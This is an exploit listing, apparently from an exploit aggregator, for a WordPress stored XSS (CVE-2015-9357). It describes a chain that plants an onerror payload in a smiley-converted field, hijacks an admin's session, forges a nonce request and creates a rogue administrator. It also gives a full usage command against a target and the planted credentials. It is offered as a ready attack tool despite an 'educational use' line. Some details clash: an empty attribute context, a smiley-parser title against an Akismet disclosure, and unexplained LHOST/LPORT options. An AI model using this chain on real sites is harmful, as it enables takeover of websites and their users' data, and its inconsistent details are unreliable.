## https://sploitus.com/exploit?id=AFA9B134-5F05-5222-9883-9FF99C6BDF35
# CVE-2015-9357
wordpress smiley/emoticon parser stored xss, admin user creation via forged nonce request.
breaks out of `` attribute context through the emoticon regex, lands js in an `onerror` handler. no script tag needed, survives wp_kses filtering on the affected field.
chain: submit payload to any field that gets smiley-converted, admin views it, xss fires in their session, pulls create-user nonce from user-new.php, posts new administrator account, confirm via login.
lab/educational use only. requires the target field to actually apply wordpress smiley conversion, varies by theme/plugin.
original vuln disclosure: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
## usage
```
python3 CVE-2015-9357.py -t https://target -l LHOST -p LPORT \
--endpoint https://target/wp-admin/admin-ajax.php \
--field message --action --nonce \
--data "name=a,email=a@a.com,phone=a"
```
`--endpoint` / `--field` depend on where the vulnerable input actually lives (comments, contact form, etc), find it manually first.
output on success: admin creds (`pwned` / `Password123!`) and wp-admin url.
## by saretawa